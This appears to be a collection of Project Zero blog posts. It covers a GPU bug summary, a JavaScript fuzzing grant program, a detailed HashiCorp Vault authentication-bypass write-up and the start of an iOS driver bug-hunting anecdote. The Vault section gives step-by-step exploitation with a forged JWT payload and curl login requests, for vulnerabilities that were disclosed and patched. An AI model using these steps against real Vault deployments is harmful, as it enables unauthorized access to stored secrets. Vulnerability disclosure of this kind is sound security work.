This blog post describes a unique and unusually powerful security issue affecting Qualcomm's Adreno GPU. We outlined the design of the GPU and kernel driver, and some side effects of that design that result in a shared memory attack on the GPU itself. This led to a relatively stable race condition that bypassed the GPU protected mode and gave attacker controlled GPU commands access to arbitrary physical memory. Ultimately this could be used to build an Android sandbox escape exploit that gives kernel code execution. Finally, we discussed the planned fix, the fix timeline, and gave some additional recommendations for areas of future improvement.


Thank you to Guang Gong for first reporting this fascinating style of attack, and to Qualcomm for a very prompt, open, and professional response to my additional research.

Announcing the Fuzzilli Research Grant Program

Posted by Samuel Groß, Project Zero


Project Zero’s mission is to make 0-day hard in order to improve end-user security. We attack this problem in different ways, including supporting other security researchers. While Google currently offers research grants, they are limited to academics and those affiliated with universities. 


Today we are announcing a new USD $50,000 pilot program to foster research into JavaScript engine fuzzing through Google Compute Engine (GCE) credit grants. Here is how it works:


  1. Interested researchers submit a proposal for a project about fuzzing JavaScript engines.

  2. The proposal will be reviewed by an internal review board and, if accepted, the researchers will be awarded up to USD $5,000 in GCE credits per submission to be used for fuzzing.

  3. All bugs found throughout the course of the project must be reported directly to the affected vendors. Researchers can claim full CVE credits and applicable bug bounties.

Overview

The program is designed to promote research into new approaches for JavaScript engine fuzzing. Examples of research areas that we are especially interested in include:

  • Custom, domain specific sanitizers such as WebKit’s does GC validation or bounds check elimination verification which can help detect bugs that would otherwise go unnoticed as they don’t immediately cause observable failures

  • New, possibly domain-specific feedback metrics to guide JavaScript/JIT engine fuzzers

  • Different high-level fuzzing approaches such as differential fuzzing

  • New code mutation or generation approaches that outperform existing ones

  • Targeted approaches to fuzz for variants of previously reported bugs


Applications can be submitted by filling out this form. Submissions are not limited to those in academia or those with a demonstrated track record of success - if you have a good idea in this space, we'd love to hear from you. Incoming submissions will be reviewed by a review board on a regular basis and we aim to respond to every submission within 2 weeks. If the project is accepted, the researchers may be awarded GCE credits worth up to USD $5,000. Researchers can also apply for multiple grants throughout the lifetime of a project. The grants come with the following requirements:

  • The credits must be used for fuzzing JavaScript engines with the approach described in the proposal. The fuzzed JavaScript engines should be one or more of the following: JavaScriptCore (Safari), v8 (Chrome, Edge), or Spidermonkey (Firefox).

  • All vulnerabilities found must be only reported to the affected vendor. Researchers are encouraged to apply Project Zero’s 90-day disclosure policy. Researchers may claim any CVE credits and bug bounty payouts for reporting the bugs that don’t conflict with these requirements.

  • Any newly developed source code must be published under an open source license that permits further research by others. 

  • An interim report for Google only at the conclusion of the fuzzing, to demonstrate the initial results of the research, so we can determine the efficacy of the research and make our folks in accounting happy.

  • Furthermore, a final report of some form (e.g. a conference paper, a blog post, or a standalone PDF) due no later than 6 months after the first grant for a project has been awarded, including:

    • A detailed explanation of the project

    • Basic statistics about which engines have been fuzzed for how long (CPU time, iterations, etc.)

    • A clear technical explanation of all vulnerabilities discovered throughout the project.


Researchers are encouraged to base their project on the open source Fuzzilli fuzzer if possible, which, amongst other features, already supports distributed fuzzing on GCE.

Timeline

The pilot program will run for one year, from Oct 1, 2020 until Oct 1, 2021. Applications can be submitted at any time during this period, however, the program might end earlier if funds are exhausted.

Motivation

JavaScript engine security continues to be critical for user safety, as demonstrated by recent in-the-wild 0day exploits abusing vulnerabilities in v8, the JavaScript engine behind Chrome. Unfortunately, fuzzing JavaScript engines to uncover these vulnerabilities is generally quite expensive due to their high complexity and relatively slow processing of input. As a rough datapoint, the GCE instances used to find the ~20 bugs with Fuzzilli in 2019 cost around USD $10,000. Income from bug bounty programs is uncertain, as there is no guarantee a new approach will also discover new bugs. Moreover, as any bounty money is paid out only later, researchers need to bear the costs of fuzzing in advance. This likely results in bugs staying unfixed and thus exploitable for longer. This program aims to help solve this problem.


Scope of Pilot

This program is similar to Google Cloud research credits, though that program is limited to  university affiliates. In contrast, this program is specifically designed to accept submissions from anyone.


This program is also similar to the Chrome Fuzzer Program. However, the Chrome Fuzzer Program is limited to LibFuzzer-based fuzzers or blackbox fuzzers, neither of which can currently support a fuzzer like Fuzzilli due to technical limitations. In addition, it is also not currently possible to experiment with custom engine “sanitizers” that detect bugs before they result in otherwise observable misbehaviour. Overall, this program allows researchers greater flexibility around their fuzzing approach but limits the scope to JavaScript engine fuzzing.

Legal points

We are unable to issue grants to individuals who are on sanctions lists, or who are in countries (e.g. Cuba, Iran, North Korea, Sudan and Syria) on sanctions lists. You are responsible for any tax implications depending on your country of residency and citizenship. There may be additional restrictions on your ability to enter depending upon your local law.


This is not a competition, but rather an experimental and discretionary grant program. You should understand that we can cancel the program at any time and the decision as to whether or not to award a grant is entirely at our discretion.


Of course, your testing must not violate any law, or disrupt or compromise any data that is not your own.


Enter the Vault: Authentication Issues in HashiCorp Vault

 Posted by Felix Wilhelm, Project Zero

Introduction

In this blog post I'll discuss two vulnerabilities in HashiCorp Vault and its integration with Amazon Web Services (AWS) and Google Cloud Platform (GCP). These issues can lead to an authentication bypass in configurations that use the aws and gcp auth methods, and demonstrate the type of issues you can find in modern “cloud-native” software. Both vulnerabilities (CVE-2020-16250/16251) were addressed by HashiCorp and are fixed in Vault versions 1.2.5, 1.3.8, 1.4.4 and 1.5.1 released in August.


Vault is a widely used tool for securely storing, generating and accessing secrets such as API keys, passwords or certificates. It can be used as a shared password manager for human users, but its feature set is optimized for API based access by other services. An example use case for Vault is to provide one of your services, such as your webserver, short lived credentials to your database or a third-party resource like an AWS S3 bucket.


Using a central secret storage like Vault offers security benefits such as centralized auditing, enforced credentials rotation or encrypted data storage. However, a central storage is also a very interesting target for an attacker. Exploiting a vulnerability in Vault could give an attacker full access to a wide range of important secrets and large parts of the target's infrastructure.


Before diving into the technical details of the vulnerabilities, the next section gives an overview about Vault’s authentication architecture and the way it integrates with cloud providers. Readers familiar with Vault can feel free to skip this section.

Authenticating to Vault

Interfacing with Vault requires authentication and Vault supports role-based access control to govern access to stored secrets. For authentication, it supports pluggable auth methods ranging from static credentials, LDAP or Radius, to full integration into third-party OpenID Connect (OIDC) providers or Cloud Identity Access Management (IAM) platforms. For infrastructure that runs on a supported cloud provider, using the provider's IAM platform for authentication is a logical choice.


Take AWS as an example: Almost every workload you can run in AWS executes in the context of a specific AWS IAM user. By enabling and configuring the aws auth method, you can create a mapping between certain IAM users or roles to Vault roles.


Imagine that you have an AWS Lambda function and want to give it access to a database password stored in Vault. Instead of storing hard coded credentials in the function code, a Vault administrator can assign a vault role to the Lambda function execution role using the vault CLI:


vault write auth/aws/role/dbclient auth_type=iam \

              bound_iam_principal_arn=arn:aws:iam::123456789012:role/lambda-role policies=prod,dev max_ttl=10m


This will create a mapping between a vault role named dbclient and the AWS IAM role lambda-role. A vault policy can now be used to grant the dbclient role access to the database secret.


When the lambda function executes, it authenticates to Vault by sending a request to the /v1/auth/aws/login API endpoint. I’ll go into the exact layout of this request later in the post, but for now just assume that the request allows Vault to verify the AWS IAM role of the caller. If authentication succeeds, Vault returns a short-lived API token for the dbclient role back to the lambda function. This token can now be used to fetch the database secret from Vault. Depending on the database backend, this secret could be a static user-password combination, a short lived client certificate or even a dynamically created credential pair.


Using Vault in this way has some nice security benefits: The lambda function itself does not need to contain bootstrap credentials and every access to the database credentials is auditable. Rotating old or compromised database credentials is straightforward and can be centrally enforced.


However, this operational simplicity is only possible because of hidden complexity in the AWS iam auth method. How does the /v1/auth/aws/login API endpoint actually work and is there a way a unauthenticated attacker can impersonate a random AWS IAM role? Let’s take a look.

sts:GetCallerIdentity

Vault’s aws auth method supports two different authentication mechanisms internally: iam and ec2. We are interested in the iam mechanism, which is the recommended variant and also used in our previous Lambda example. iam auth is built on top of an AWS API method called GetCallerIdentity, part of the AWS Security Token Service (STS).


As its name implies, GetCallerIdentity returns details about the IAM role or user whose credentials were used to call the API. To understand how Vault uses this method to authenticate clients we need to understand how AWS APIs perform authentication:


Instead of attaching some form of authentication token or credential to API requests, AWS requires clients to calculate an HMAC signature for the (canonicalized) request using the caller's secret access key and attach this signature to the request. This mechanism makes it possible to pre-sign a request and forward it to another party to allow a limited form of impersonation. A popular example use case is to give clients the ability to upload a file to S3 without giving them access to credentials with write permissions.


The Vault aws authentication mechanism is a simple variant of this technique. 

The client pre-signs an HTTP request to the STS GetCallerIdentity method and sends a serialized version of it to the Vault server. The Vault server sends the pre-signed requests to the STS host and extracts the AWS IAM information out of the result. The server-side part of this flow is implemented in pathLoginUpdate in builtin/credential/aws/path_login.go:


func (b *backend) pathLoginUpdateIam(ctx context.Context, req *logical.Request, data *framework.FieldData) (*logical.Response, error) {

    method := data.Get("iam_http_request_method").(string)

    ...

    // In the future, might consider supporting GET

    if method != "POST" {

            return logical.ErrorResponse(...), nil

    }


    rawUrlB64 := data.Get("iam_request_url").(string)

    ...

    rawUrl, err := base64.StdEncoding.DecodeString(rawUrlB64)

    ...

    parsedUrl, err := url.Parse(string(rawUrl))

    if err != nil {

            return logical.ErrorResponse(...), nil

    }


    bodyB64 := data.Get("iam_request_body").(string)

    ...

    bodyRaw, err := base64.StdEncoding.DecodeString(bodyB64)

    ...        

    body := string(bodyRaw)


    headers := data.Get("iam_request_headers").(http.Header)

    

    endpoint := "https://sts.amazonaws.com"


    ...


    callerID, err := submitCallerIdentityRequest(ctx, maxRetries, method, endpoint, parsedUrl, body, headers)



The function extracts HTTP method, URL, body and headers out of the supplied request body which is stored in data. It then calls submitCallerIdentity to forward the request to the STS server and to fetch and parse the result in parseGetCallerIdentityResponse:


func submitCallerIdentityRequest(ctx context.Context, maxRetries int, method, endpoint string, parsedUrl *url.URL, body string, headers http.Header) (*GetCallerIdentityResult, error) {

    ...

    request := buildHttpRequest(method, endpoint, parsedUrl, body, headers)

    retryableReq, err := retryablehttp.FromRequest(request)

    ...

    response, err := retryingClient.Do(retryableReq)

    responseBody, err := ioutil.ReadAll(response.Body)

    ...

    if response.StatusCode != 200 {

            return nil, fmt.Errorf(..)

    }

    callerIdentityResponse, err := parseGetCallerIdentityResponse(string(responseBody))

    if err != nil {

            return nil, fmt.Errorf("error parsing STS response")

    }

    return &callerIdentityResponse.GetCallerIdentityResult[0], nil

}

 

func buildHttpRequest(method, endpoint string, parsedUrl *url.URL, body string, headers http.Header) *http.Request {

    ...

    targetUrl := fmt.Sprintf("%s/%s", endpoint, parsedUrl.RequestURI()) 

    request, err := http.NewRequest(method, targetUrl, strings.NewReader(body))

    ...

    request.Host = parsedUrl.Host

    for k, vals := range headers {

            for _, val := range vals {

                    request.Header.Add(k, val)

            }

    }

    return request

}


buildHttpRequest creates a http.Request object based on the user supplied parameters, but uses the hardcoded constant https://sts.amazonaws.com to build the target URL. 

Without this restriction, we could simply trigger a request to a server under our control and return a fake caller identity.


However, the complete lack of validation for URL path, query, POST body and HTTP headers still looks like a promising attack surface. The next section describes how we can turn this gap into a full authentication bypass.

STS (Caller) Identity Theft 

Our goal is to trick Vault’s submitCallerIdentityRequest function into returning an attacker controlled caller identity. One way to achieve this is to manipulate the Vault server into sending a request to a host we control, bypassing the hardcoded endpoint host. Looking at the buildHttpRequest method, two approaches come to mind:

  • The code for calculating targetUrl targetUrl := fmt.Sprintf("%s/%s", endpoint, parsedUrl.RequestURI()) doesn't look very robust against URL parsing issues. However, tricks like embedding a fake userinfo (https://sts.amazonaws.com/:[email protected]/test) and similar ideas do not work against the robust Go URL parser.

  • Even though Vault will always create a HTTPS request pointing at the hardcoded endpoint, the attacker has full control over the Host http header (request.Host = parsedUrl.Host). This could be a problem if a load balancer in front of the STS API makes routing decisions based on the Host header, but blind testing against the STS host did not lead to any success.


After ruling out the easy way forward, we still have another approach available: Vault does not restrict our URL query parameters. This means we are not limited to pre-signing requests to GetCallerIdentity and can create requests to any action of the STS API. STS supports 8 different actions, but none gives us the ability to completely control the response. At this point I was slowly getting frustrated and decided to take a look at Vault’s response parsing code:


func parseGetCallerIdentityResponse(response string) (GetCallerIdentityResponse, error) {

        decoder := xml.NewDecoder(strings.NewReader(response))

        result := GetCallerIdentityResponse{}

        err := decoder.Decode(&result)

        return result, err

}


type GetCallerIdentityResponse struct {

 XMLName                 xml.Name                 `xml:"GetCallerIdentityResponse"`

 GetCallerIdentityResult []GetCallerIdentityResult `xml:"GetCallerIdentityResult"`

 ResponseMetadata        []ResponseMetadata        `xml:"ResponseMetadata"`

}



parseGetCallerIdentityResponse is called on every response received from STS as long as the status code is 200. The function uses the Golang standard XML library to decode an XML response into a GetCallerIdentityResponse structure and returns an error if decoding fails. 


There is an easy to miss problem with this code: Vault never enforces or verifies that the STS response is actually XML encoded. While STS responses are XML encoded by default, it also supports JSON encoding for clients that send an Accept: application/json HTTP header.


For Vault, this turns into a security issue due to a somewhat surprising feature of the Go XML decoder: The decoder silently ignores non XML content before and after the expected XML root. This means that calling parseGetCallerIdentityResponse with a (JSON encoded) server response such as ‘{“abc” : “xzy<GetCallerIdentityResponse></GetCallerIdentityResponse>}’ will succeed and return an (empty) CallerIdentityResponse structure.


This brings us really close to our goal of spoofing an arbitrary caller identity: We just need to find a STS action that reflects attacker controlled text as part of its API response. Serialize a request to it while including an Accept: application/json header and put an arbitrary GetCallerIdentityResponse XML blob into the reflected payload.


Finding a reflected parameter that is not constrained to alpha-numeric characters turns out to be tricky. After some trial and error, I decided to target the AssumeRoleWithWebIdentity action and its SubjectFromWebIdentityToken response element. AssumeRoleWithWebIdentity is used to translate JSON Web Tokens (JWT) signed by an OpenID Connect (OIDC)  provider into AWS IAM identities. 

Sending a request to this action with a valid signed JWT will return the sub field of the token in the SubjectFromWebIdentityToken field.


Of course, a normal OIDC provider won’t sign a JWT with an XML payload in the subject field. Still, an attacker can just create their own OIDC Identity Provider (IdP), register it on an AWS account they own and sign arbitrary tokens with their own keys.


Let's put all of this together and walk through the full attack step-by-step.


  1. Create a minimal OIDC IdP. This boils down to generating a RSA key pair, creating an OIDC discovery.json and key.json document and hosting the json files on a web server (see here, for an example setup using S3).

  2. Use your own AWS account to register an OID IdP -> AWS IAM role mapping. It is important to note that the AWS account used for this does not need to have any relationship with our target.

  3. We can now use our OIDP to sign a JWT that contains an arbitrary GetCallerIdentityResponse as part of its subject claim. A decoded example token could look like this: iss, azp and aud match the details specified in the step 2. sub contains our spoofed response, identifying us as the AWS IAM account arn:aws:iam::superprivileged-aws-account


{'iss': 'https://oidc-test-wrbvvljkzwtfpiikylvpckxgafdkxfba.s3.amazonaws.com/',

 'azp': 'abcdef', 'aud': 'abcdef', 

 'sub': '<GetCallerIdentityResponse><GetCallerIdentityResult><Arn>arn:aws:iam::superprivileged-aws-account</Arn><UserId>XYZ</UserId></GetCallerIdentityResult></GetCallerIdentityResponse>',

 'exp': 1595120834, 'iat': 1594207895}


  1. We can test if everything is setup correctly by sending a direct request to the STS AssumeRoleWithWebIdentity action using the (signed) token from step 3 and the RoleArn used in step 2:


curl -H "Accept: application/json"

'https://sts.amazonaws.com/?DurationSeconds=900&Action=AssumeRoleWithWebIdentity&Version=2011-06-15&RoleSessionName=web-identity-federation&RoleArn=arn:aws:iam::XZY::YOUR-OIDC-ROLE&WebIdentityToken=YOURTOKEN'


If everything goes as planned STS will reflect the token subject as part of its JSON encoded response. As discussed above, the Go XML decoder will skip all of the content before and after the GetCallerIdentityResponse object leading Vault to consider this a valid STS CallerIdentity response.


{"AssumeRoleWithWebIdentityResponse":{"AssumeRoleWithWebIdentityResult":

{"AssumedRoleUser":{"Arn":"arn:aws:iam::XZY::YOUR-OIDC-ROLE/web-identity-federation","AssumedRoleId":"AROATQ4R7PP5JJNLOF5P6:web-identity-federation"},

"Audience":"abcdef","Credentials":{...},"PackedPolicySize":null,"Provider":"arn:aws:iam::242434931706:oidc-provider/oidc-test-wrbvvljkzwtfpiikylvpckxgafdkxfba.s3.amazonaws.com/",

"SubjectFromWebIdentityToken":"<GetCallerIdentityResponse><GetCallerIdentityResult><Arn>arn:aws:iam::superprivileged-aws-account</Arn><UserId>XYZ</UserId></GetCallerIdentityResult></GetCallerIdentityResponse>"},

"ResponseMetadata":....}


  1. The final step is to convert this request into the form expected by Vault (e.g base64 encoding all required headers, the url and an empty post body) and to send it to the target Vault server as a login request on /v1/auth/aws/login. Vault will deserialize the request, send it to STS and misinterpret the response. If the AWS ARN/UserID in our fake GetCallerIdentityResponse has privileges on the Vault server we get a valid session token back, which we can use to interact with the Vault server to fetch some secrets.


curl -X POST "https://vault-server/v1/auth/aws/login" -d '{"role":"dev-role-iam",

"iam_http_request_method": "POST", "iam_request_body": "encoded-body", , "iam_request_headers" :

"encoded-headers", "iam_request_url" : "encoded-url"}'


{"request_id":"59b09a0b-f5d5-f4c4-8ed0-af86a2c1f5d4","lease_id":"","renewable":false,"lease_duration":0,"data":null,"wrap_info":null,"warnings":["TTL

of \"768h\" exceeded the effective max_ttl of \"500h\"; TTL value is capped

accordingly"],"auth":{"client_token":"s.Kx3bUNw6wEc5bbkrKBiGW6WL","accessor":"TBRh0hvfd4FkYEAyFrUE3i2P","policies":["default","dev","prod"],"token_policies":["default","dev","prod"],

"metadata":{"account_id":"242434931706","auth_type":"iam","role_id":"47faaf36-c8ab-c589-396c-2643c26e7b30"},

"lease_duration":1800000,"renewable":true,"entity_id":"447e1efe-0fd4-aa10-3a54-52405c0c69ab","token_type":"service","orphan":true}}


I wrote a proof-of-concept exploit that takes care of most of the busy work around JWT creation and serialization. While the OIDC provider setup adds some complexity, we end up with a nice authentication bypass for arbitrary AWS enabled roles. The only requirement is that the attacker knows the name of an privileged AWS role in the target Vault server. 


What went wrong here? Looking at it from an attacker perspective, the whole authentication mechanism seems clever but error-prone. Putting HTTP request forwarding into the unauthenticated external attack surface of a security product requires strong confidence in the implementation and the underlying HTTP libraries. This becomes even more difficult as the security depends on implementation details of the Security Token Service, which might change at any point in the future. For example, AWS might decide to put STS behind a load balancing frontend, which uses the Host header for routing decisions. Without any change to the Vault codebase, this could severely degrade the security of this authentication mechanism from one moment to another. 


Of course, there is a reason why the authentication works as described: AWS IAM doesn’t have a straightforward way of proving a service’s identity to other non-AWS services. Third-party services can’t easily verify pre-signed requests and AWS IAM doesn’t offer any standard signing primitives that could be used to implement certificate based authentication or JWTs.

In the end, Hashicorp fixed the vulnerability by enforcing an allowlist of HTTP headers, restricting requests to the GetCallerIdentity action and stronger validation of the STS response, which is hopefully enough to protect against unexpected changes to the STS implementation or HTTP parser differences between STS and Golang.


After finding this issue in the AWS authentication module, I decided to review its GCP equivalent. The next section describes how GCP authentication for Vault is implemented and how a simple logic flaw can lead to an authentication bypass in many configurations.

Exploiting Vault-on-GCP

Vault supports the gcp auth method for deployments on Google Cloud. Similar to its AWS counterpart, the auth method supports two different authentication mechanisms: iam and gce. Whereas the iam mechanism supports arbitrary service accounts and can be used from services such as App Engine or Cloud Functions, gce can only be used to authenticate virtual machines running on Google Compute Engine. Still, it has some interesting advantages. Instead of only making authentication decisions based on a service account identity, gce can also grant access based on a number of VM attributes. For example, a configuration could give only VMs in a specific region (europe-west-6) access to certain secrets, allow all VMs in the xyz-prod GCP project access or restrict it even further using instance-groups.


Both iam and gce are built on top of JWT. A vault client that wants to

authenticate, creates a signed token to prove its identity and sends it to the vault

server to get a session token back. For the iam mechanism, the client signs the token directly

using a service account private key under their control or with the projects.serviceAccounts.signJwt IAM API method.


For gce, the client is expected to run on an authorized GCE VM. It fetches a signed token by sending a request to the instance identity endpoint of the GCP metadata server. In contrast to service account tokens, this token is signed by an official Google certificate. In addition to the normal JWT claims (sub, aud, iat, exp), the tokens returned from the metadata server also contains a special compute_engine claim that lists details about the instance, which are processed as part of the auth process:


"google":{"compute_engine":{"instance_creation_timestamp":1594641932,"instance_id":"671398237781058X

XXX","instance_name":"vault","project_id":"fwilhelm-testing-XXXX","project_number":950612XXXX,"zone":"europe-west3-c"}}


JWT has a number of design choices that make it very prone to implementation errors (see this blog post by securitum for an overview about typical issues), so I decided to spend a day on reviewing Vault’s token processing.


The function parseAndValidateJwt is responsible for processing both gce and iam tokens.

It first parses the token without verifying the signature and passes the decoded token into the getSigningKey helper method:


// Process JWT string.

signedJwt, ok := data.GetOk("jwt")

if !ok {

        return nil, errors.New("jwt argument is required")

}


// Parse 'kid' key id from headers.

jwtVal, err := jwt.ParseSigned(signedJwt.(string))

if err != nil {

        return nil, errwrap.Wrapf("unable to parse signed JWT: {{err}}", err)

}


key, err := b.getSigningKey(ctx, jwtVal, signedJwt.(string), loginInfo.Role, req.Storage) 

if err != nil {

        return nil, errwrap.Wrapf("unable to get public key for signed JWT: %v", err)

}


getSigningKey extracts the key id claim (kid) out of the token header and tries to find a google-wide oAuth key with the same identifier. This will work for GCE metadata tokens, but not for tokens signed by a service account:


func (b *GcpAuthBackend) getSigningKey(...) (interface{}, error) {

b.Logger().Debug("Getting signing Key for JWT")


if len(token.Headers) != 1 {

        return nil, errors.New("expected token to have exactly one header")

}

kid := token.Headers[0].KeyID

b.Logger().Debug("kid found for JWT", "kid", kid)


// Try getting Google-wide key

k, gErr := gcputil.OAuth2RSAPublicKey(ctx, kid)

if gErr == nil {

        b.Logger().Debug("Found Google OAuth2 provider key", "kid", kid)

        return k, nil

}



If this approach fails, the Vault server extracts the Subject (sub) claim from the supplied token. For valid tokens, this claim contains the email address of the signing service account. Knowing the key id and subject of the token, Vault fetches the public key used for signing using the service account GCP API:


// If that failed, try to get account-specific key

b.Logger().Debug("Unable to get Google-wide OAuth2 Key, trying service-account public key")

saId, err := getJWTSubject(rawToken)

if err != nil {

        return nil, err

}

k, saErr := gcputil.ServiceAccountPublicKey(saId, kid)

if saErr != nil {

        return nil, errwrap.Wrapf(fmt.Sprintf("unable to get public key %q for JWT subject %q: {{err}}", kid, saId), saErr)

}


return k, nil


In both cases, the Vault server now has access to a public key that can verify the signature of the JWT:


// Parse claims and verify signature.

baseClaims := &jwt.Claims{}

customClaims := &gcputil.CustomJWTClaims{}


if err = jwtVal.Claims(key, baseClaims, customClaims); err != nil {

        return nil, err

}


if err = validateBaseJWTClaims(baseClaims, loginInfo.RoleName); err != nil {

        return nil, err

}


If verification succeeds, Vault fills out the loginInfo struct that is later used to grant or deny access. If the token contains a compute_engine claim it is copied into the loginInfo.GceMetada field:


loginInfo.JWTClaims = baseClaims


if len(baseClaims.Subject) == 0 {

        return nil, errors.New("expected JWT to have non-empty 'sub' claim")

}

loginInfo.EmailOrId = baseClaims.Subject


if customClaims.Google != nil && customClaims.Google.Compute != nil &&  len(customClaims.Google.Compute.InstanceId) > 0 {

        loginInfo.GceMetadata = customClaims.Google.Compute

}


if loginInfo.Role.RoleType == gceRoleType && loginInfo.GceMetadata == nil {

        return nil, errors.New("expected JWT to have claims with GCE metadata")

}


return loginInfo, nil


As mentioned above, all of this code is shared between the iam and gce auth methods. The issue here is that no check enforces that a token signed by an arbitrary service account doesn’t contain GCE compute_engine claims. While the content in a GCE metadata token is trustworthy and controlled by Google, service account tokens are completely controlled by the owner of the service account and can therefore contain arbitrary claims.


If we follow the control flow of the gce method to the end we can see that Vault uses loginInfo.GceMetadata as part of its auth decision in pathGceLogin if two conditions are met:

  • The VM described in the metadata section needs to exist. This is verified using the GCE API and requires an attacker to impersonate an actively running VM. In practice, only project_id, zone and instance_name are verified and need to be set to valid values.

  • The service account in subject claim of the JWT token needs to exist. This is verified using the ServiceAccount GCP API which requires the iam.serviceAccounts.get permission in the project hosting the service account. As the attacker can just use a service account in their own project, it is straightforward to just grant this permission to the GCP identity Vault is running under or even allUsers.


Finally, AuthorizeGCE is called to grant or deny access. If the attacker impersonated

a GCE instance with the right attributes (project, label, zones..) everything works out well and

the attacker gets a valid session token back. The only auth restriction that can’t be bypassed is a hardcoded service account name, as this value will be equal to the attacker account and not the expected VM account name.


An end-to-end attack against a vulnerable configuration will look like this:

  1. Create a service account in a GCP project you control and generate a private key using gcloud: gcloud iam service-accounts keys create key.json --iam-account [email protected]

  2. Sign a JWT with a fake compute_engine claim describing an existing and privileged VM. See here for a simple proof-of-concept script that takes care of most of the details.

  3. Now simply use the token to sign-in to Vault: curl --request POST --data '{"role": "my-gce-role", "jwt" : "...."}' http://vault:8200/v1/auth/gcp/login


This is an interesting bug that requires some knowledge of GCP IAM to spot. The root cause  seems to be the merging of two separate authentication flows into a single code path in the parseAndValidateJwt function, which makes it difficult to reason about all security requirements when writing or reviewing the code. At the same time, GCP makes it easy to shoot yourself in the foot by offering two types of JWT tokens with completely different security properties.

Conclusion

This blog post describes two authentication vulnerabilities in HashiCorp Vault, a “cloud-native” software for secret management. While Vault was clearly developed with security in mind and profits from the memory safety and high quality standard library of its implementation language Go, I was still able to identify two critical vulnerabilities in its unauthenticated attack surface.


In my experience, tricky vulnerabilities like this often exist where developers have to interact with external systems and services. A strong developer might be able to reason about all security boundaries, requirements and pitfalls of their own software, but it becomes very difficult once a complex external service comes into play. Modern cloud IAM solutions are powerful and often more secure than comparable on-premise solutions, but they come with their own security pitfalls and a high implementation complexity. As more and more companies move to the big cloud providers, familiarity with these technology stacks will become a key skill for security engineers and researchers and it is safe to assume that there will be a lot of similar issues in the next few years.


Finally, both discussed vulnerabilities demonstrate how difficult it is to write secure software. Even with memory-safe languages, strong cryptography primitives, static analysis and large fuzzing infrastructure, some issues can only be discovered by manual code review and an attacker mindset.


Oops, I missed it again!

Written by Brandon Azad, when working at Project Zero


This is a quick anecdotal post describing one of the more frustrating aspects of vulnerability research: realizing that you missed a bug that was staring you in the face only once you see the patched version!

Some suspicious code

After writing the oob_timestamp exploit, I spent some time trying to find another vulnerability to exploit. Typically, it's a lot easier to develop an exploit when you already have a research platform (read: another exploit) available to help with your analysis, for example by dumping kernel memory to ensure that your heap spray is placing objects at their intended locations. Developing an exploit blind, as I had done with voucher_swap, is much trickier. (For oob_timestamp, I relied on checkra1n to bootstrap the exploit on A11, and later expanded it to A13.) So, I thought it might be nice to chain my next exploit off of oob_timestamp to avoid having to re-bootstrap later.


As I had already spent a fair amount of time reversing the iOS 13.3 (17C54) kernelcache for oob_timestamp, I decided to continue that effort on a new user client. I wrote a small program to enumerate IOUserClient classes reachable from the app sandbox (inadvertently discovering another bug in the process) and looked for classes that I had not researched previously.


A quick primer for those less familiar with Apple kernels: Apple's kernel is called XNU, and IOKit is XNU's C++ framework for implementing drivers. An app in userspace can call IOServiceGetMatchingServices() to get handles to the drivers, but the app can't actually do much with the raw driver handle. Instead, the app needs to direct the driver to create a "user client" by calling IOServiceOpen(), passing the type of user client it wants. Since the user client is what provides most of the functionality to userspace, this is the step that is subject to a sandbox check, ensuring that the app is allowed to open the requested type of user client. Once the app has a handle to a user client for the driver, the app can interact with the user client by calling functions like IOConnectCallMethod() on the user client handle, specifying the "selector" (index) of the method the app wants to invoke. In the kernel, IOConnectCallMethod() will use the selector to index a table of methods provided by the user client, invoking the one requested.


As I was scanning for user clients I could open, one reachable class stood out: H11ANEInDirectPathClient, a user client of the H11ANEIn driver. I hadn't seen this class before, but some quick Googling showed that it wasn't open source, which suggested to me that the code had probably undergone substantially less security review, and hence probably had more low-hanging bugs in it, than the open-source parts of the kernel.


I discovered several interesting things in the process of reversing. First, H11ANEIn appeared to actually have 2 user clients: H11ANEInDirectPathClient (the one I had opened) and H11ANEInUserClient (which I could not open in the sandbox). Reading the strings in the method H11ANEIn::newUserClient(), it appeared that H11ANEInDirectPathClient is the less privileged version of H11ANEInUserClient, so it made sense that I could open the former but not the latter.


if ( type == 1 ) // H11ANEInDirectPathClient

{

    _os_log_internal(...,

        "%s : ... : Creating direct evaluate client\n",

        "virtual IOReturn H11ANEIn::newUserClient(...)");

    ...

}

else // H11ANEInUserClient

{

    _os_log_internal(...,

        "%s : ... : Creating default full-entitlement client\n",

        "virtual IOReturn H11ANEIn::newUserClient(...)");

    ...

}


The traditional starting point when looking for bugs in IOKit user clients is to look at the external methods that are provided. These are usually identifiable as tables of function pointers near the user client's vtable in the kernelcache image. Here are the external method tables I identified for the two user clients, curiously laid out back-to-back in the kernelcache rather than each near their respective vtable:



Also, I noticed something interesting when I looked at the cross-references to these two tables: it seemed like since the classes were basically identical except for one being a less-privileged version of the other, Apple had made the rather unusual decision to share the parts of the external method tables corresponding to shared functionality between the two user client types!


This was evident from how the ::externalMethod() methods of each user client accessed the overlapping parts of the external method tables. The H11ANEInDirectPathClient version:


int H11ANEInDirectPathClient::externalMethod(H11ANEInDirectPathClient *this, u32 selector, IOExternalMethodArguments *args, IOExternalMethodDispatch *method, void *target)

{

    if ( !target )

        target = this;

    if ( selector <= 33 )

        method = &H11ANEInDirectPathClient_ExternalMethods_34[selector];

    return IOUserClient::externalMethod(this, selector, args, method, target);

}


And the H11ANEInUserClient version:


int H11ANEInUserClient::externalMethod(H11ANEInUserClient *this, u32 selector, IOExternalMethodArguments *args, IOExternalMethodDispatch *method, void *target)

{

    if ( !target )

        target = this;

    if ( selector <= 33 )

        method = &H11ANEInUserClient_ExternalMethods_34[selector];

    return IOUserClient::externalMethod(this, selector, args, method, target);

}


Since each can access 34 methods and the first 3 in the array are reserved for H11ANEInDirectPathClient, this meant that the last 3 would be reserved for H11ANEInUserClient, which seemed to check out since there were 37 methods total. Neat.


So, I started digging into the methods accessible by H11ANEInDirectPathClient, and very quickly adopted the opinion that the code quality in this driver was not very high. For example, I found that the 3500-line method H11ANEIn::ANE_ProgramSendRequest_gated(), reachable through selectors 2 and 33, exhibited some pretty trivial out-of-bounds reads right at the top of the function:



Here, the content of args is fully controlled, so the args->totInputBuffers count can be arbitrarily high, past the ends of the inputBufferSymbolIndex and inputBufferSurfaceId arrays.


Since the code quality seemed to be low, and since I was not particularly keen on untangling multi-thousand-line functions, I also tried to perform some very trivial fuzzing. My fuzzing experience was quite limited, but I had long ago written a dumb fuzzer that just blindly calls IOConnectCallMethod() from userspace passing randomly generated values; surprisingly, this had been sufficient before to find real kernel vulnerabilities. So, I decided to revive that old fuzzer and point it at H11ANEInDirectPathClient.


Within one second of launching the fuzzer app, the device panicked.


